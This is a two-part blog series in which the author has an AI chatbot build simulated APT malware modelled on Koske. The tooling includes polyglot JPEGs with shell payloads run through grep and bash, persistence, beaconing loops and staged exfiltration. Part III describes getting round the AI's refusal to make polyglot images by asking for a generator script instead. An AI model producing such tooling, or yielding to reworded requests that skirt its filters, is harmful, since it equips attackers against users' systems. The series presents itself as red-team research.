The One-Man APT with Artificial Intelligence, Part III: From Zero to Local Dominance

By: Smouk

With in-memory execution and simulated exfiltration already in place, the next step was obvious: persistence. Advanced threats like Koske don’t just run once—they stay alive, blend into the system, and return after every reboot. That’s exactly what I set out to replicate in this phase.

The goal? To see if the AI could not only generate payloads that behave like persistent malware, but also suggest and configure real-world persistence mechanisms like systemd services or .bashrc entries—again, without me writing any code manually.
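For perspective on what such a mechanism looks like, a .bashrc persistence entry can be as small as a single appended line. Below is a minimal, harmless sketch in Python (shown in Python because that is where the experiment eventually lands); everything in it is my illustration, not the AI's output:

    # Illustrative only: append a harmless marker command to ~/.bashrc so each
    # new shell refreshes a timestamp file, simulating persistence. The marker
    # file name mirrors the persistence_demo.txt used later in the post.
    import os

    entry = 'date >> "$HOME/persistence_demo.txt"  # simulated persistence marker\n'
    with open(os.path.expanduser("~/.bashrc"), "a") as fh:
        fh.write(entry)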

Let’s see how far the AI can go when asked to survive a reboot.

Simulated Attack Chain: Building Complexity

At this stage, the challenge escalates. Instead of focusing on isolated behaviors like beaconing or exfiltration, I asked the AI to generate a safe, all-in-one payload that could simulate a full attack chain. The idea was to build a structured sequence of actions—like compiling a fake binary, faking persistence, collecting environment data, and retrieving a file—mirroring the complexity of how real APTs like Koske operate.

The AI responded with a well-structured, harmless payload that compiles a dummy C program (fakerootkit), creates a marker file to simulate persistence (persistence_demo.txt), collects system info (cpu_check.txt), and downloads a benign PDF as a stand-in for a cryptominer. All of this is packed into a polyglot image that can be triggered with a single command, just like earlier stages.

From here on, each request I make builds on the last, and the behavior becomes increasingly layered. This is where the simulation begins to truly reflect the modular, adaptive structure of a real-world APT—only it’s being built entirely through natural language prompts.

Bypassing AI Limitations: Changing the Assembly Vector

As I continued expanding the complexity of the simulation, I hit a wall: the AI stopped generating polyglot images directly, likely due to internal safety filters. But rather than breaking the experiment’s core rule—no manual payload writing—I took a different approach. I asked the AI to give me a Python script that could generate the image locally.

The result was a clean, minimal script that uses the PIL library to create a basic JPEG image, then appends a harmless shell payload that opens a terminal and runs whoami. The AI provided everything: image generation, payload logic, encoding, and the binary append operation—effectively giving me the same polyglot result, just via a different toolchain.
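As a rough reconstruction, the generator likely resembled the sketch below. It assumes the Pillow (PIL) library; the # PAYLOAD marker and the whoami command come from the post, while every other detail is an assumption rather than the AI's actual code:

    # Hedged reconstruction, not the original script: build a valid JPEG with
    # Pillow, then append a harmless shell section after the image data. Image
    # viewers ignore trailing bytes, so the file still renders normally.
    from PIL import Image

    PAYLOAD = b"\n# PAYLOAD\nwhoami\n"  # benign demo command from the post

    Image.new("RGB", (64, 64), "white").save("polyglot_terminal_whoami.jpg", "JPEG")
    with open("polyglot_terminal_whoami.jpg", "ab") as fh:
        fh.write(PAYLOAD)  # binary append keeps the JPEG intact

Extracting and running the trailing section with grep and bash then yields the whoami output, exactly as the post describes.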

This moment reflected a real-world tactic perfectly: when direct delivery fails, an APT often falls back to alternative methods like packer-based generation or local compilation. Here, the AI simulated that behavior without being asked to—and kept the flow going.

Payload Assembly Without Manual Scripting

To stay within the bounds of the experiment, I didn’t manually write or alter the payload logic. Instead, I simply copied and pasted the code provided by the AI—line by line—into a local environment, using it exactly as delivered. The full simulated attack chain was now assembled via Python: fake binary compilation, mock persistence, system enumeration, and simulated cryptominer download.

This approach preserved the project’s core rule: I was still not writing code myself—the AI was doing all the work. The only difference was that now, instead of delivering a final image, it handed me the blueprints. And in real-world terms, this mimics the shift from payload delivery to toolkits and builders—exactly the kind of modularity we see in modern APT ecosystems like Koske.

Final Execution: Complete Polyglot Delivery Chain

For this phase, the objective was clear: demonstrate a full local execution chain that accurately reflects the behavior of the targeted APT — but using only safe, demonstrative payloads.

This time, the image wasn’t delivered directly. Due to AI restrictions, I adapted the approach by requesting a Python script that would locally generate the final polyglot image. The script would:

  • Create a simple JPEG file
  • Embed the full simulated attack chain as a shell payload

Once the script ran, the generated image (polyglot_terminal_whoami.jpg) behaved exactly as expected when triggered with the terminal command:

grep -a -A9999 "# PAYLOAD" polyglot_terminal_whoami.jpg | bash

Here, grep -a treats the binary image as plain text, and -A9999 prints every line after the # PAYLOAD marker, piping the embedded script straight into bash. The image then executed a chain that (reconstructed in the sketch after this list):

  • Compiled a harmless “fakerootkit” binary
  • Simulated persistence via a timestamped text file
  • Collected CPU information into a local dump
  • Downloaded the PDF (“Linux Basics for Hackers 2 ed”) as a stand-in for staged payload delivery
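Based on those four steps, the appended shell section plausibly looked like the string below, written the way a generator script would embed it after the # PAYLOAD marker. The file names come from the post; the exact commands and the download URL are assumptions:

    # Hedged reconstruction of the embedded shell chain (not the original).
    # PDF_URL is a placeholder for wherever the decoy PDF was hosted.
    ATTACK_CHAIN = r"""
    # PAYLOAD
    printf 'int main(void){return 0;}\n' > /tmp/fakerootkit.c
    gcc /tmp/fakerootkit.c -o /tmp/fakerootkit            # 1. harmless dummy binary
    date > "$HOME/persistence_demo.txt"                   # 2. persistence marker
    lscpu > "$HOME/cpu_check.txt"                         # 3. CPU/system enumeration
    curl -fsSL "$PDF_URL" -o "$HOME/Downloads/decoy.pdf"  # 4. simulated staged download
    """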

All steps ran in sequence, without errors, cleanly emulating the kind of behavior observed in staged APT attacks — from initial execution, to local recon, to staged download activity.

Summary

This third stage marked a major technical leap in our emulation of the APT’s behavior. Faced with limitations in image payload generation, we adapted by leveraging Python to produce fully functional polyglot JPEGs locally.

The resulting image executed a complete mock attack chain: compiling a fake binary, simulating persistence, collecting system info, and downloading a decoy PDF — each step carefully reflecting the operational flow of the APT. By shifting to script-based generation while maintaining payload integrity, we advanced our alignment with the adversary’s methodology without compromising control or structure.

There’s something else I haven’t revealed yet — in an upcoming entry, I’ll show how, through the same sequence of prompts used in this project, I was able to obtain a fully functional rootkit for Linux. Stay tuned — I’ll be back soon.

Until next time…

Smouk out!

The One-Man APT – Part II: Stealthy Exfiltration with AI

By: Smouk

In the first part of this project, I explored how artificial intelligence can be used to simulate the early stages of a stealthy APT—focusing on polyglot files, in-memory execution, and basic command-and-control behavior. Everything was generated by the AI: from code to corrections, including full payload packaging inside an image file.

Escalating the Simulation: Persistence Begins

At this stage, I wanted to move faster and explore a critical capability of advanced persistent threats: staying alive. A one-shot payload is interesting, but it doesn’t fully reflect how real threats operate. So I asked the AI to build a more advanced script—one that runs in a continuous loop, mimics beaconing behavior using HTTP headers, includes debugging output, and could be executed in a way that makes it compatible with persistence methods like systemd, nohup, or even cron.

The AI immediately returned a fully working proof-of-concept: a Bash script designed for controlled internal testing, which runs in an infinite loop, sends periodic requests with Range headers, and adapts to the environment based on whether curl or wget is available. It even included a variant that can be run inline—exactly the format needed for integration with persistence services. This wasn’t just a script—it was an adaptable, modular payload ready to be embedded and kept alive.
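The post's script was Bash; purely as an illustration, here is a functionally similar loop sketched in Python, with the Range header, offset tracking, and debug output. The URL is a placeholder for an internal test server, and none of this is the AI's actual output:

    # Illustrative Python stand-in for the Bash beacon described above:
    # periodic requests carrying a Range header, with simple offset tracking.
    # Runs until interrupted. BEACON_URL is a placeholder, not from the post.
    import time
    import urllib.request

    BEACON_URL = "http://127.0.0.1:8000/beacon"
    offset = 0
    while True:
        req = urllib.request.Request(BEACON_URL, headers={"Range": f"bytes={offset}-"})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                offset += len(resp.read())   # advance state like the script's byte offsets
                print(f"[debug] beacon ok, offset={offset}")
        except OSError as exc:
            print(f"[debug] beacon failed: {exc}")
        time.sleep(10)                       # interval matching the 10-second loop described later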

Iterating for Realism: Improved Loop and Embedded Payload

Once I had the new script with persistent behavior and HTTP Range headers working, I decided to hand it back to the AI to see what it would do next. The goal was to test how well it could take a user-supplied payload and fully encapsulate it into a new polyglot image—one that mimics a real persistence loop, usable with systemd or nohup.

The result was polyglot_improved.jpg, an updated version that runs indefinitely, sending requests every 10 seconds using either curl or wget, and tracking state using byte offsets. The image behaves like a normal file, but under the hood, it continuously simulates C2 beaconing.

More interestingly, the AI didn’t stop there—it immediately offered to enhance the payload further, suggesting features like exfiltration, dynamic target resolution, or stealth. These aren’t just minor tweaks; they’re exactly the kind of behaviors seen in modern malware families and APT toolkits. Once again, the AI wasn’t just building code—it was proactively proposing ways to evolve the attack logic.

Simulating Exfiltration: Moving the Target

At this point, I decided to follow one of the AI's own suggestions: testing a basic form of exfiltration. I wanted to keep things local and harmless, so I asked it to simulate the process using one of the most iconic files for any security lab: Linux Basics for Hackers 2ed.pdf.
I instructed the AI to generate a payload that would first check for the presence of that file, move it to the ~/Downloads directory, and then initiate the HTTP beaconing loop as before. Within seconds, it produced a new polyglot image—polyglot_exfil.jpg—ready to test.
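In Python terms (again a stand-in for the actual shell payload), the staging logic amounts to the sketch below; the PDF's starting location is an assumption, since the post only says the payload checks for the file's presence:

    # Hedged sketch of the staging step: check for the target file, move it to
    # ~/Downloads, then fall through to the beacon loop. The source directory
    # is assumed; only the file name and destination come from the post.
    import shutil
    from pathlib import Path

    target = Path.home() / "Linux Basics for Hackers 2ed.pdf"   # assumed location
    staging = Path.home() / "Downloads"
    if target.exists():
        staging.mkdir(exist_ok=True)
        shutil.move(str(target), str(staging / target.name))    # local staging only
    # ...then start the HTTP beaconing loop as before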

This step aligns perfectly with typical APT behavior: locating files of interest, staging them, and preparing for exfiltration. While in this case the file didn’t leave the system, the logic mimicked exactly how real malware performs staged data collection before sending it off to a remote listener. The fact that the AI stitched this behavior together so naturally just reinforces the experiment’s core question: how close can AI get to autonomously simulating advanced threat logic?

Debugging the Exfiltration Flow

I tested the new image—polyglot_exfil.jpg—but quickly ran into an issue: the request wasn’t formatted correctly, and the file wasn’t downloaded. Consistent with my approach, I didn’t troubleshoot the code myself. Instead, I described the symptoms to the AI in natural language and asked it to fix the behavior.

It responded with a revised payload embedded in a new image—polyglot_pdf_exfil.jpg. This version was designed to fetch the PDF file directly from an internal server via HTTP, then move it to the ~/Downloads folder using either curl or wget, depending on what was available. The logic was clean, clearly commented, and ready to run.
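That selection logic is straightforward to picture. As a Python stand-in for what the shell payload does (url and dest are placeholders, not values from the post):

    # Illustrative curl-or-wget fallback, mirroring the payload's behavior.
    import os
    import shutil
    import subprocess

    url = "http://127.0.0.1:8000/book.pdf"             # placeholder test server
    dest = os.path.expanduser("~/Downloads/book.pdf")  # placeholder destination
    if shutil.which("curl"):
        subprocess.run(["curl", "-fsSL", url, "-o", dest], check=True)
    elif shutil.which("wget"):
        subprocess.run(["wget", "-q", url, "-O", dest], check=True)
    else:
        raise SystemExit("neither curl nor wget is available")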

More importantly, the AI showed an ability to not only identify the bug but also restructure the entire flow, maintaining modularity and adaptability—just like a well-designed malware loader would under real operational constraints.

Finalizing the Exfiltration Payload

Even with the revised version—polyglot_pdf_exfil.jpg—the payload still wasn’t working exactly as intended. The AI had attempted to expand variables like URL and FILENAME within a heredoc, but they weren’t being parsed correctly at runtime, leading to malformed requests.

Again, I avoided editing the code myself. I simply shared the terminal output and a screenshot of the behavior. The AI analyzed the situation and explained the root cause clearly: variable expansion within quoted heredoc blocks fails unless the values are injected beforehand.

The fix? It rewrote the script to inject the actual values before writing the heredoc section—solving the problem elegantly. Then it packaged everything into a new image, polyglot_pdf_fixed.jpg, which successfully downloaded the correct file from the specified URL and saved it locally. This showed that the AI wasn’t just capable of debugging—it was learning context across iterations, adjusting its output to match previous failures. That’s not just automation; it’s adaptation.
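The failure mode is a classic one: a heredoc opened with a quoted delimiter (<<'EOF') suppresses all variable expansion, so $URL and $FILENAME reach the script as literal text. The fix the AI chose, baking the values in before the shell section is written, looks roughly like this in a Python generator (a sketch under assumptions, not the actual code):

    # Sketch of the fix: substitute the real values in Python *before* writing
    # the shell section, so nothing depends on expansion inside a quoted heredoc.
    # The URL is a placeholder for the internal test server.
    URL = "http://127.0.0.1:8000/Linux_Basics_for_Hackers_2ed.pdf"
    DEST = "$HOME/Downloads/Linux Basics for Hackers 2ed.pdf"

    payload = f"""
    # PAYLOAD
    if command -v curl >/dev/null 2>&1; then
        curl -fsSL "{URL}" -o "{DEST}"
    else
        wget -q "{URL}" -O "{DEST}"
    fi
    """

    with open("polyglot_pdf_fixed.jpg", "ab") as fh:   # append to the image as before
        fh.write(payload.encode())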

Successful Execution: Complete Simulated Exfiltration

This time, everything worked exactly as intended. The image polyglot_pdf_fixed.jpg, when executed, downloaded the target PDF from the internal test server and saved it to the correct destination path using the selected available tool (curl or wget). No syntax errors, no broken variables, no unexpected behavior—just a clean, functional simulation of a staged exfiltration operation.

As shown in the demo GIF, the full logic (file check, transfer, and persistent HTTP beaconing) executed smoothly. The payload was fully generated, debugged, corrected, and repackaged by the AI across several iterations. This marked the first complete and autonomous simulation of a full exfiltration flow, built entirely via natural language instructions. No manual scripting. No reverse engineering. Just controlled, replicable behavior… designed by a chatbot.

Summary

In this second phase, the simulation advanced from basic command-and-control logic to staged file exfiltration—entirely generated and corrected by AI. Each step stayed tightly aligned with the real TTPs of the Koske APT: use of polyglot images, in-memory execution, environmental adaptation, and modular payloads.

The AI didn’t just generate scripts—it refined them iteratively, just like an automated APT framework would. With the successful simulation of persistent beaconing and file movement, we’re now one step closer to replicating Koske’s full behavior—ethically, transparently, and with zero manual coding.

Until next time…

Smouk out!
